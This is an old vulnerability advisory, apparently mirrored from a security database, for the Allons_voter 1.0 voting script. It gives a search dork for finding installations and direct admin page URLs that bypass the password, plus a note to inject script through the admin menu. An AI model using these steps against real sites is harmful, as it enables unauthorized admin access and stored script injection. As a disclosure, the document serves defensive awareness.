Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16020
HistoryFeb 11, 2007 - 12:00 a.m.

Allons_voter Version 1.0 xss and admin votes

2007-02-1100:00:00
vulners.com
35
  • Allons_voter Version 1.0 xss and admin votes wihtout password

  • By : sn0oPy

  • Risk : medium

  • Dork : inurl:"Allons_voter"

  • exploit :

        Be admin : 
               
                  http://www.target.com/Allons_voter/menu.html
                  replace it by  
                  http://www.target.com/Allons_voter/admin_ajouter.php
                  or http://www.target.com/Allons_voter/admin_supprimer.php
       + inject any script on the admin add menu.
    
  • contact : [email protected]

  • greetz : [subzero], Avg Team(forums.avenir-geopolitique.net).

Rะนference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2641